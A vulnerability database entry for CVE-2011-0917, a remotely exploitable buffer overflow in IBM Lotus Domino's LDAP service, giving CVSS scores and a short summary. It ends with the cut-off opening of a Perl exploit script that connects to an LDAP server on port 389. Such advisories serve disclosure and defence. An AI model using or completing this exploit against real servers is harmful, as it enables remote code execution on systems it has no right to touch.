10
CVSSv2

CVE-2011-0917

Published: 08/02/2011 Updated: 25/02/2011
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in nLDAP.exe in IBM Lotus Domino allows remote malicious users to execute arbitrary code via a long string in an LDAP Bind operation, aka SPR KLYH87LMVX.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm lotus domino

Exploits

#!/usr/bin/perl ## Source: ## wwwprotekresearchlabcom/indexphp?option=com_content&view=article&id=23&Itemid=23 use Getopt::Std; use IO::Socket::INET; $SIG{INT} = \&abort; my $host = '19216810066'; my $port = 389; my $proto = 'tcp'; my $sockType = SOCK_STREAM; my $timeout = 1; if (defined $opt{h}) { usage() ...